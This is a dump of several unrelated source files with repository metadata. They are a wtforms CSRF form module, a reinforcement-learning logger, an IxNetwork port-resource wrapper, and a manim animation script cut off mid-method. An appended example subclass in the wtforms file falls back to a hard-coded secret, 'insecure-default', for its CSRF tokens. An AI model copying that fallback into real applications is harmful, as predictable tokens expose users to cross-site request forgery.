eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
[
"MIT"
] | 1
|
2021-06-01T23:32:38.000Z
|
2021-06-01T23:32:38.000Z
|
venv/lib/python3.6/site-packages/wtforms/ext/csrf/form.py
|
aitoehigie/britecore_flask
|
eef1873dbe6b2cc21f770bc6dec783007ae4493b
|
[
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from wtforms.form import Form
from wtforms.validators import ValidationError
from .fields import CSRFTokenField
class SecureForm(Form):
"""
Form that enables CSRF processing via subclassing hooks.
"""
csrf_token = CSRFTokenField()
def __init__(self, formdata=None, obj=None, prefix="", csrf_context=None, **kwargs):
"""
:param csrf_context:
Optional extra data which is passed transparently to your
CSRF implementation.
"""
super(SecureForm, self).__init__(formdata, obj, prefix, **kwargs)
self.csrf_token.current_token = self.generate_csrf_token(csrf_context)
def generate_csrf_token(self, csrf_context):
"""
Implementations must override this to provide a method with which one
can get a CSRF token for this form.
A CSRF token should be a string which can be generated
deterministically so that on the form POST, the generated string is
(usually) the same assuming the user is using the site normally.
:param csrf_context:
A transparent object which can be used as contextual info for
generating the token.
"""
raise NotImplementedError()
def validate_csrf_token(self, field):
"""
Override this method to provide custom CSRF validation logic.
The default CSRF validation logic simply checks if the recently
generated token equals the one we received as formdata.
"""
if field.current_token != field.data:
raise ValidationError(field.gettext("Invalid CSRF Token"))
@property
def data(self):
d = super(SecureForm, self).data
d.pop("csrf_token")
return d
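# --- Illustrative sketch (not part of wtforms): a minimal subclass whose
# token is an HMAC of a per-session secret. The ``session_secret`` key and
# the ``ExampleSecureForm`` name are assumptions made for this example.
import hashlib
import hmac
class ExampleSecureForm(SecureForm):
    def generate_csrf_token(self, csrf_context):
        # ``csrf_context`` is passed through Form construction untouched, so
        # the application chooses its shape; here we assume a dict carrying a
        # session-scoped secret, which keeps the token deterministic for a
        # given session, as the docstring above requires.
        secret = (csrf_context or {}).get("session_secret", "insecure-default")
        return hmac.new(secret.encode(), b"csrf", hashlib.sha256).hexdigest()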
| 32.472727
| 88
| 0.666853
|
from __future__ import unicode_literals
from wtforms.form import Form
from wtforms.validators import ValidationError
from .fields import CSRFTokenField
class SecureForm(Form):
csrf_token = CSRFTokenField()
def __init__(self, formdata=None, obj=None, prefix="", csrf_context=None, **kwargs):
super(SecureForm, self).__init__(formdata, obj, prefix, **kwargs)
self.csrf_token.current_token = self.generate_csrf_token(csrf_context)
def generate_csrf_token(self, csrf_context):
raise NotImplementedError()
def validate_csrf_token(self, field):
if field.current_token != field.data:
raise ValidationError(field.gettext("Invalid CSRF Token"))
@property
def data(self):
d = super(SecureForm, self).data
d.pop("csrf_token")
return d
| true
| true
|
f707a2f41d8e690e8b8403065e8ca856caf1f920
| 8,370
|
py
|
Python
|
meta_logger.py
|
moojink/drq
|
e05c337aeb6fcae30c2db6e4afaca65e94511bbd
|
[
"MIT"
] | null | null | null |
meta_logger.py
|
moojink/drq
|
e05c337aeb6fcae30c2db6e4afaca65e94511bbd
|
[
"MIT"
] | null | null | null |
meta_logger.py
|
moojink/drq
|
e05c337aeb6fcae30c2db6e4afaca65e94511bbd
|
[
"MIT"
] | null | null | null |
import csv
import json
import os
import shutil
from collections import defaultdict
import numpy as np
import torch
import torchvision
from termcolor import colored
from torch.utils.tensorboard import SummaryWriter
COMMON_TRAIN_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float'),
('duration', 'D', 'time')]
COMMON_EVAL_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float')]
AGENT_TRAIN_FORMAT = {
'drq': [('batch_reward', 'BR', 'float'), ('actor_loss', 'ALOSS', 'float'),
('critic_loss', 'CLOSS', 'float'),
('alpha_loss', 'TLOSS', 'float'), ('alpha_value', 'TVAL', 'float'),
('actor_entropy', 'AENT', 'float')]
}
class AverageMeter(object):
def __init__(self):
self._sum = 0
self._count = 0
def update(self, value, n=1):
self._sum += value
self._count += n
def value(self):
return self._sum / max(1, self._count)
class MetersGroup(object):
def __init__(self, file_name, formating):
self._csv_file_name = self._prepare_file(file_name, 'csv')
self._formating = formating
self._meters = defaultdict(AverageMeter)
self._csv_file = open(self._csv_file_name, 'w')
self._csv_writer = None
def _prepare_file(self, prefix, suffix):
file_name = f'{prefix}.{suffix}'
if os.path.exists(file_name):
os.remove(file_name)
return file_name
def log(self, key, value, n=1):
self._meters[key].update(value, n)
def _prime_meters(self):
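        # drop the 'train/' or 'eval/' prefix and flatten any remaining '/'
        # so keys become plain CSV column names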
data = dict()
for key, meter in self._meters.items():
if key.startswith('train'):
key = key[len('train') + 1:]
else:
key = key[len('eval') + 1:]
key = key.replace('/', '_')
data[key] = meter.value()
return data
def _dump_to_csv(self, data):
if self._csv_writer is None:
self._csv_writer = csv.DictWriter(self._csv_file,
fieldnames=sorted(data.keys()),
restval=0.0)
self._csv_writer.writeheader()
self._csv_writer.writerow(data)
self._csv_file.flush()
def _format(self, key, value, ty):
if ty == 'int':
value = int(value)
return f'{key}: {value}'
elif ty == 'float':
return f'{key}: {value:.04f}'
elif ty == 'time':
return f'{key}: {value:04.1f} s'
else:
            raise ValueError(f'invalid format type: {ty}')
def _dump_to_console(self, data, prefix):
prefix = colored(prefix, 'yellow' if prefix == 'train' else 'green')
pieces = [f'| {prefix: <14}']
for key, disp_key, ty in self._formating:
value = data.get(key, 0)
pieces.append(self._format(disp_key, value, ty))
print(' | '.join(pieces))
def dump(self, step, prefix, save=True):
if len(self._meters) == 0:
return
if save:
data = self._prime_meters()
data['step'] = step
self._dump_to_csv(data)
self._dump_to_console(data, prefix)
self._meters.clear()
class Logger(object):
def __init__(self,
log_dir,
save_tb=False,
log_frequency=10000,
action_repeat=1,
agent='drq'):
self._log_dir = log_dir
self._log_frequency = log_frequency
self._action_repeat = action_repeat
if save_tb:
tb_dir = os.path.join(log_dir, 'tb')
if os.path.exists(tb_dir):
try:
shutil.rmtree(tb_dir)
                except OSError:
                    print("meta_logger.py warning: Unable to remove tb directory")
pass
self._sw = SummaryWriter(tb_dir)
else:
self._sw = None
# each agent has specific output format for training
assert agent in AGENT_TRAIN_FORMAT
train_format = COMMON_TRAIN_FORMAT + AGENT_TRAIN_FORMAT[agent]
self._train_mg = MetersGroup(os.path.join(log_dir, 'train'),
formating=train_format)
self._eval_mg = MetersGroup(os.path.join(log_dir, 'eval'),
formating=COMMON_EVAL_FORMAT)
def _should_log(self, step, log_frequency):
log_frequency = log_frequency or self._log_frequency
return step % log_frequency == 0
def _update_step(self, step):
return step * self._action_repeat
def _try_sw_log(self, key, value, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_scalar(key, value, step)
def _try_sw_log_image(self, key, image, step):
step = self._update_step(step)
if self._sw is not None:
assert image.dim() == 3
grid = torchvision.utils.make_grid(image.unsqueeze(1))
self._sw.add_image(key, grid, step)
def _try_sw_log_video(self, key, frames, step):
step = self._update_step(step)
if self._sw is not None:
frames = torch.from_numpy(np.array(frames))
frames = frames.unsqueeze(0)
self._sw.add_video(key, frames, step, fps=30)
def _try_sw_log_histogram(self, key, histogram, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_histogram(key, histogram, step)
def log(self, key, value, step, n=1, log_frequency=1):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def eval_log(self, key, value, step, n=1, log_frequency=1):
"""Same as self.log(), except we don't call self._should_log().
In other words, we always log."""
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def log_param(self, key, param, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
self.log_histogram(key + '_w', param.weight.data, step)
if hasattr(param.weight, 'grad') and param.weight.grad is not None:
self.log_histogram(key + '_w_g', param.weight.grad.data, step)
if hasattr(param, 'bias') and hasattr(param.bias, 'data'):
self.log_histogram(key + '_b', param.bias.data, step)
if hasattr(param.bias, 'grad') and param.bias.grad is not None:
self.log_histogram(key + '_b_g', param.bias.grad.data, step)
def log_image(self, key, image, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_image(key, image, step)
def log_video(self, key, frames, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_video(key, frames, step)
def log_histogram(self, key, histogram, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_histogram(key, histogram, step)
def dump(self, step, save=True, ty=None):
step = self._update_step(step)
if ty is None:
self._train_mg.dump(step, 'train', save)
self._eval_mg.dump(step, 'eval', save)
elif ty == 'eval':
self._eval_mg.dump(step, 'eval', save)
elif ty == 'train':
self._train_mg.dump(step, 'train', save)
else:
            raise ValueError(f'invalid log type: {ty}')
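# --- Illustrative usage sketch (the directory name and logged values are
# assumptions made for this example):
def _example_logger_usage():
    logger = Logger('./runs/example', save_tb=False, agent='drq')
    for step in range(3):
        # the default log_frequency=1 means every step is recorded
        logger.log('train/episode_reward', float(step), step)
    logger.dump(2, ty='train')  # averages meters, prints, appends to train.csv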
| 36.391304
| 79
| 0.573357
|
import csv
import json
import os
import shutil
from collections import defaultdict
import numpy as np
import torch
import torchvision
from termcolor import colored
from torch.utils.tensorboard import SummaryWriter
COMMON_TRAIN_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float'),
('duration', 'D', 'time')]
COMMON_EVAL_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float')]
AGENT_TRAIN_FORMAT = {
'drq': [('batch_reward', 'BR', 'float'), ('actor_loss', 'ALOSS', 'float'),
('critic_loss', 'CLOSS', 'float'),
('alpha_loss', 'TLOSS', 'float'), ('alpha_value', 'TVAL', 'float'),
('actor_entropy', 'AENT', 'float')]
}
class AverageMeter(object):
def __init__(self):
self._sum = 0
self._count = 0
def update(self, value, n=1):
self._sum += value
self._count += n
def value(self):
return self._sum / max(1, self._count)
class MetersGroup(object):
def __init__(self, file_name, formating):
self._csv_file_name = self._prepare_file(file_name, 'csv')
self._formating = formating
self._meters = defaultdict(AverageMeter)
self._csv_file = open(self._csv_file_name, 'w')
self._csv_writer = None
def _prepare_file(self, prefix, suffix):
file_name = f'{prefix}.{suffix}'
if os.path.exists(file_name):
os.remove(file_name)
return file_name
def log(self, key, value, n=1):
self._meters[key].update(value, n)
def _prime_meters(self):
data = dict()
for key, meter in self._meters.items():
if key.startswith('train'):
key = key[len('train') + 1:]
else:
key = key[len('eval') + 1:]
key = key.replace('/', '_')
data[key] = meter.value()
return data
def _dump_to_csv(self, data):
if self._csv_writer is None:
self._csv_writer = csv.DictWriter(self._csv_file,
fieldnames=sorted(data.keys()),
restval=0.0)
self._csv_writer.writeheader()
self._csv_writer.writerow(data)
self._csv_file.flush()
def _format(self, key, value, ty):
if ty == 'int':
value = int(value)
return f'{key}: {value}'
elif ty == 'float':
return f'{key}: {value:.04f}'
elif ty == 'time':
return f'{key}: {value:04.1f} s'
else:
            raise ValueError(f'invalid format type: {ty}')
def _dump_to_console(self, data, prefix):
prefix = colored(prefix, 'yellow' if prefix == 'train' else 'green')
pieces = [f'| {prefix: <14}']
for key, disp_key, ty in self._formating:
value = data.get(key, 0)
pieces.append(self._format(disp_key, value, ty))
print(' | '.join(pieces))
def dump(self, step, prefix, save=True):
if len(self._meters) == 0:
return
if save:
data = self._prime_meters()
data['step'] = step
self._dump_to_csv(data)
self._dump_to_console(data, prefix)
self._meters.clear()
class Logger(object):
def __init__(self,
log_dir,
save_tb=False,
log_frequency=10000,
action_repeat=1,
agent='drq'):
self._log_dir = log_dir
self._log_frequency = log_frequency
self._action_repeat = action_repeat
if save_tb:
tb_dir = os.path.join(log_dir, 'tb')
if os.path.exists(tb_dir):
try:
shutil.rmtree(tb_dir)
                except OSError:
                    print("meta_logger.py warning: Unable to remove tb directory")
pass
self._sw = SummaryWriter(tb_dir)
else:
self._sw = None
assert agent in AGENT_TRAIN_FORMAT
train_format = COMMON_TRAIN_FORMAT + AGENT_TRAIN_FORMAT[agent]
self._train_mg = MetersGroup(os.path.join(log_dir, 'train'),
formating=train_format)
self._eval_mg = MetersGroup(os.path.join(log_dir, 'eval'),
formating=COMMON_EVAL_FORMAT)
def _should_log(self, step, log_frequency):
log_frequency = log_frequency or self._log_frequency
return step % log_frequency == 0
def _update_step(self, step):
return step * self._action_repeat
def _try_sw_log(self, key, value, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_scalar(key, value, step)
def _try_sw_log_image(self, key, image, step):
step = self._update_step(step)
if self._sw is not None:
assert image.dim() == 3
grid = torchvision.utils.make_grid(image.unsqueeze(1))
self._sw.add_image(key, grid, step)
def _try_sw_log_video(self, key, frames, step):
step = self._update_step(step)
if self._sw is not None:
frames = torch.from_numpy(np.array(frames))
frames = frames.unsqueeze(0)
self._sw.add_video(key, frames, step, fps=30)
def _try_sw_log_histogram(self, key, histogram, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_histogram(key, histogram, step)
def log(self, key, value, step, n=1, log_frequency=1):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def eval_log(self, key, value, step, n=1, log_frequency=1):
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def log_param(self, key, param, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
self.log_histogram(key + '_w', param.weight.data, step)
if hasattr(param.weight, 'grad') and param.weight.grad is not None:
self.log_histogram(key + '_w_g', param.weight.grad.data, step)
if hasattr(param, 'bias') and hasattr(param.bias, 'data'):
self.log_histogram(key + '_b', param.bias.data, step)
if hasattr(param.bias, 'grad') and param.bias.grad is not None:
self.log_histogram(key + '_b_g', param.bias.grad.data, step)
def log_image(self, key, image, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_image(key, image, step)
def log_video(self, key, frames, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_video(key, frames, step)
def log_histogram(self, key, histogram, step, log_frequency=None):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
self._try_sw_log_histogram(key, histogram, step)
def dump(self, step, save=True, ty=None):
step = self._update_step(step)
if ty is None:
self._train_mg.dump(step, 'train', save)
self._eval_mg.dump(step, 'eval', save)
elif ty == 'eval':
self._eval_mg.dump(step, 'eval', save)
elif ty == 'train':
self._train_mg.dump(step, 'train', save)
else:
            raise ValueError(f'invalid log type: {ty}')
| true
| true
|
f707a3492c750af198258b9f0c53a07e78fef229
| 7,298
|
py
|
Python
|
uhd_restpy/testplatform/sessions/ixnetwork/locations/ports/ports.py
|
Vibaswan/ixnetwork_restpy
|
239fedc7050890746cbabd71ea1e91c68d9e5cad
|
[
"MIT"
] | null | null | null |
uhd_restpy/testplatform/sessions/ixnetwork/locations/ports/ports.py
|
Vibaswan/ixnetwork_restpy
|
239fedc7050890746cbabd71ea1e91c68d9e5cad
|
[
"MIT"
] | null | null | null |
uhd_restpy/testplatform/sessions/ixnetwork/locations/ports/ports.py
|
Vibaswan/ixnetwork_restpy
|
239fedc7050890746cbabd71ea1e91c68d9e5cad
|
[
"MIT"
] | null | null | null |
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class Ports(Base):
"""
The Ports class encapsulates a list of ports resources that are managed by the system.
A list of resources can be retrieved from the server using the Ports.find() method.
"""
__slots__ = ()
_SDM_NAME = 'ports'
_SDM_ATT_MAP = {
'Description': 'description',
'IsAvailable': 'isAvailable',
'IsBusy': 'isBusy',
'IsLinkUp': 'isLinkUp',
'Location': 'location',
'Owner': 'owner',
'ResourceMode': 'resourceMode',
}
def __init__(self, parent):
super(Ports, self).__init__(parent)
@property
def Description(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def IsAvailable(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsAvailable'])
@property
def IsBusy(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsBusy'])
@property
def IsLinkUp(self):
"""
Returns
-------
- bool:
"""
return self._get_attribute(self._SDM_ATT_MAP['IsLinkUp'])
@property
def Location(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Location'])
@property
def Owner(self):
"""
Returns
-------
- str:
"""
return self._get_attribute(self._SDM_ATT_MAP['Owner'])
@property
def ResourceMode(self):
"""
Returns
-------
- str(normal | tenGig | fortyGig | singleMode | dualMode | hundredGigNonFanOut | fortyGigFanOut | threeByTenGigFanOut | eightByTenGigFanOut | fourByTwentyFiveGigNonFanOut | twoByTwentyFiveGigNonFanOut | oneByFiftyGigNonFanOut | fortyGigNonFanOut | oneByTenGigFanOut | fourByTenGigFanOut | incompatibleMode | hundredGigCapturePlayback | fortyGigCapturePlayback | novusHundredGigNonFanOut | novusFourByTwentyFiveGigNonFanOut | novusTwoByFiftyGigNonFanOut | novusOneByFortyGigNonFanOut | novusFourByTenGigNonFanOut | krakenOneByFourHundredGigNonFanOut | krakenOneByTwoHundredGigNonFanOut | krakenTwoByOneHundredGigFanOut | krakenFourByFiftyGigFanOut | aresOneOneByFourHundredGigNonFanOut | aresOneTwoByTwoHundredGigFanOut | aresOneFourByOneHundredGigFanOut | aresOneFourByOneHundredGigMacSecFanOut | aresOneEightByFiftyGigFanOut | uhdOneHundredEightByHundredGigNonFanOut | uhdOneHundredEightByFortyGigNonFanOut | uhdOneHundredSixteenByFiftyGigFanOut | uhdOneHundredThirtyTwoByTwentyFiveGigFanOut | uhdOneHundredThirtyTwoByTenGigFanOut | notApplicable):
"""
return self._get_attribute(self._SDM_ATT_MAP['ResourceMode'])
def find(self, Description=None, IsAvailable=None, IsBusy=None, IsLinkUp=None, Location=None, Owner=None, ResourceMode=None):
"""Finds and retrieves ports resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve ports resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all ports resources from the server.
Args
----
- Description (str):
- IsAvailable (bool):
- IsBusy (bool):
- IsLinkUp (bool):
- Location (str):
- Owner (str):
- ResourceMode (str(normal | tenGig | fortyGig | singleMode | dualMode | hundredGigNonFanOut | fortyGigFanOut | threeByTenGigFanOut | eightByTenGigFanOut | fourByTwentyFiveGigNonFanOut | twoByTwentyFiveGigNonFanOut | oneByFiftyGigNonFanOut | fortyGigNonFanOut | oneByTenGigFanOut | fourByTenGigFanOut | incompatibleMode | hundredGigCapturePlayback | fortyGigCapturePlayback | novusHundredGigNonFanOut | novusFourByTwentyFiveGigNonFanOut | novusTwoByFiftyGigNonFanOut | novusOneByFortyGigNonFanOut | novusFourByTenGigNonFanOut | krakenOneByFourHundredGigNonFanOut | krakenOneByTwoHundredGigNonFanOut | krakenTwoByOneHundredGigFanOut | krakenFourByFiftyGigFanOut | aresOneOneByFourHundredGigNonFanOut | aresOneTwoByTwoHundredGigFanOut | aresOneFourByOneHundredGigFanOut | aresOneFourByOneHundredGigMacSecFanOut | aresOneEightByFiftyGigFanOut | uhdOneHundredEightByHundredGigNonFanOut | uhdOneHundredEightByFortyGigNonFanOut | uhdOneHundredSixteenByFiftyGigFanOut | uhdOneHundredThirtyTwoByTwentyFiveGigFanOut | uhdOneHundredThirtyTwoByTenGigFanOut | notApplicable)):
Returns
-------
- self: This instance with matching ports resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of ports data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the ports resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
def ClearOwnership(self):
"""Executes the clearOwnership operation on the server.
Clears ownership on a list of location ports.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
return self._execute('clearOwnership', payload=payload, response_object=None)
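# --- Illustrative usage sketch (comments only; the session bootstrap and the
# ``ixnetwork`` name are assumptions, not part of this module):
#
#     ports = ixnetwork.Locations.find().Ports.find(IsAvailable=True)
#     for port in ports:
#         print(port.Location, port.ResourceMode)
#     ports.ClearOwnership()
#
# find() parameters are evaluated server side as regexes, so an exact match
# needs anchors, e.g. Location='^10\\.0\\.0\\.1;1;1$'.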
| 43.700599
| 1,073
| 0.699644
|
from uhd_restpy.base import Base
from uhd_restpy.files import Files
class Ports(Base):
__slots__ = ()
_SDM_NAME = 'ports'
_SDM_ATT_MAP = {
'Description': 'description',
'IsAvailable': 'isAvailable',
'IsBusy': 'isBusy',
'IsLinkUp': 'isLinkUp',
'Location': 'location',
'Owner': 'owner',
'ResourceMode': 'resourceMode',
}
def __init__(self, parent):
super(Ports, self).__init__(parent)
@property
def Description(self):
return self._get_attribute(self._SDM_ATT_MAP['Description'])
@property
def IsAvailable(self):
return self._get_attribute(self._SDM_ATT_MAP['IsAvailable'])
@property
def IsBusy(self):
return self._get_attribute(self._SDM_ATT_MAP['IsBusy'])
@property
def IsLinkUp(self):
return self._get_attribute(self._SDM_ATT_MAP['IsLinkUp'])
@property
def Location(self):
return self._get_attribute(self._SDM_ATT_MAP['Location'])
@property
def Owner(self):
return self._get_attribute(self._SDM_ATT_MAP['Owner'])
@property
def ResourceMode(self):
return self._get_attribute(self._SDM_ATT_MAP['ResourceMode'])
def find(self, Description=None, IsAvailable=None, IsBusy=None, IsLinkUp=None, Location=None, Owner=None, ResourceMode=None):
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
return self._read(href)
def ClearOwnership(self):
payload = { "Arg1": self }
return self._execute('clearOwnership', payload=payload, response_object=None)
| true
| true
|
f707a3f06a7cb5465d7d05ec43434eb468d41d63
| 153,194
|
py
|
Python
|
from_3b1b/old/uncertainty.py
|
adornetejr/manim
|
e0715ceeff4778d11ef4ac31f8f8f2b56a2187ad
|
[
"MIT"
] | 48
|
2021-06-28T01:48:01.000Z
|
2022-03-31T18:22:32.000Z
|
from_3b1b/old/uncertainty.py
|
im-AMS/manim
|
19e3c97589181ffd43ef14d9169af4e40e054664
|
[
"MIT"
] | 5
|
2021-03-19T11:41:36.000Z
|
2022-03-12T00:20:16.000Z
|
from_3b1b/old/uncertainty.py
|
im-AMS/manim
|
19e3c97589181ffd43ef14d9169af4e40e054664
|
[
"MIT"
] | 15
|
2021-06-28T07:48:36.000Z
|
2022-03-23T03:05:11.000Z
|
# -*- coding: utf-8 -*-
import scipy
from manimlib.imports import *
from from_3b1b.old.fourier import *
import warnings
warnings.warn("""
Warning: This file makes use of
ContinualAnimation, which has since
been deprecated
""")
FREQUENCY_COLOR = RED
USE_ALMOST_FOURIER_BY_DEFAULT = False
class GaussianDistributionWrapper(Line):
"""
This is meant to encode a 2d normal distribution as
a mobject (so as to be able to have it be interpolated
during animations). It is a line whose center is the mean
mu of a distribution, and whose radial vector (center to end)
is the distribution's standard deviation
"""
CONFIG = {
"stroke_width" : 0,
"mu" : ORIGIN,
"sigma" : RIGHT,
}
def __init__(self, **kwargs):
Line.__init__(self, ORIGIN, RIGHT, **kwargs)
self.change_parameters(self.mu, self.sigma)
def change_parameters(self, mu = None, sigma = None):
curr_mu, curr_sigma = self.get_parameters()
mu = mu if mu is not None else curr_mu
sigma = sigma if sigma is not None else curr_sigma
self.put_start_and_end_on(mu - sigma, mu + sigma)
return self
def get_parameters(self):
""" Return mu_x, mu_y, sigma_x, sigma_y"""
center, end = self.get_center(), self.get_end()
return center, end-center
def get_random_points(self, size = 1):
mu, sigma = self.get_parameters()
return np.array([
np.array([
np.random.normal(mu_coord, sigma_coord)
for mu_coord, sigma_coord in zip(mu, sigma)
])
for x in range(size)
])
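# Illustrative sketch (hypothetical values): a wrapper centered at the origin
# with axis-aligned standard deviations (1, 0.5) in the plane; the scenes
# below animate the same parameters rather than sampling them directly.
def _example_gaussian_wrapper():
    gdw = GaussianDistributionWrapper(mu=ORIGIN, sigma=RIGHT + 0.5 * UP)
    return gdw.get_random_points(size=5)  # five draws from the 2d normal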
class ProbabalisticMobjectCloud(ContinualAnimation):
CONFIG = {
"fill_opacity" : 0.25,
"n_copies" : 100,
"gaussian_distribution_wrapper_config" : {},
"time_per_change" : 1./60,
"start_up_time" : 0,
}
def __init__(self, prototype, **kwargs):
digest_config(self, kwargs)
fill_opacity = self.fill_opacity or prototype.get_fill_opacity()
if "mu" not in self.gaussian_distribution_wrapper_config:
self.gaussian_distribution_wrapper_config["mu"] = prototype.get_center()
self.gaussian_distribution_wrapper = GaussianDistributionWrapper(
**self.gaussian_distribution_wrapper_config
)
self.time_since_last_change = np.inf
group = VGroup(*[
prototype.copy().set_fill(opacity = fill_opacity)
for x in range(self.n_copies)
])
ContinualAnimation.__init__(self, group, **kwargs)
self.update_mobject(0)
def update_mobject(self, dt):
self.time_since_last_change += dt
if self.time_since_last_change < self.time_per_change:
return
self.time_since_last_change = 0
group = self.mobject
points = self.gaussian_distribution_wrapper.get_random_points(len(group))
for mob, point in zip(group, points):
self.update_mobject_by_point(mob, point)
return self
def update_mobject_by_point(self, mobject, point):
mobject.move_to(point)
return self
class ProbabalisticDotCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : BLUE,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
dot = Dot(color = self.color)
ProbabalisticMobjectCloud.__init__(self, dot)
class ProbabalisticVectorCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : RED,
"n_copies" : 20,
"fill_opacity" : 0.5,
"center_func" : lambda : ORIGIN,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
vector = Vector(
RIGHT, color = self.color,
max_tip_length_to_length_ratio = 1,
)
ProbabalisticMobjectCloud.__init__(self, vector)
def update_mobject_by_point(self, vector, point):
vector.put_start_and_end_on(
self.center_func(),
point
)
class RadarDish(SVGMobject):
CONFIG = {
"file_name" : "radar_dish",
"fill_color" : LIGHT_GREY,
"stroke_color" : WHITE,
"stroke_width" : 1,
"height" : 1,
}
class Plane(SVGMobject):
CONFIG = {
"file_name" : "plane",
"color" : LIGHT_GREY,
"height" : 1,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.rotate(-TAU/4)
class FalconHeavy(SVGMobject):
CONFIG = {
"file_name" : "falcon_heavy",
"color" : WHITE,
"logo_color" : BLUE_E,
"height" : 1.5,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.logo = self[-9:]
self.logo.set_color(self.logo_color)
class RadarPulseSingleton(ContinualAnimation):
CONFIG = {
"speed" : 3.0,
"direction" : RIGHT,
"start_up_time" : 0,
"fade_in_time" : 0.5,
"color" : WHITE,
"stroke_width" : 3,
}
def __init__(self, radar_dish, target, **kwargs):
digest_config(self, kwargs)
self.direction = self.direction/get_norm(self.direction)
self.radar_dish = radar_dish
self.target = target
self.reflection_distance = None
self.arc = Arc(
start_angle = -30*DEGREES,
angle = 60*DEGREES,
)
self.arc.set_height(0.75*radar_dish.get_height())
self.arc.move_to(radar_dish, UP+RIGHT)
self.start_points = np.array(self.arc.points)
self.start_center = self.arc.get_center()
self.finished = False
ContinualAnimation.__init__(self, self.arc, **kwargs)
def update_mobject(self, dt):
arc = self.arc
total_distance = self.speed*self.internal_time
arc.points = np.array(self.start_points)
arc.shift(total_distance*self.direction)
if self.internal_time < self.fade_in_time:
alpha = np.clip(self.internal_time/self.fade_in_time, 0, 1)
arc.set_stroke(self.color, alpha*self.stroke_width)
if self.reflection_distance is None:
#Check if reflection is happening
arc_point = arc.get_edge_center(self.direction)
target_point = self.target.get_edge_center(-self.direction)
arc_distance = np.dot(arc_point, self.direction)
target_distance = np.dot(target_point, self.direction)
if arc_distance > target_distance:
self.reflection_distance = target_distance
#Don't use elif in case the above code creates reflection_distance
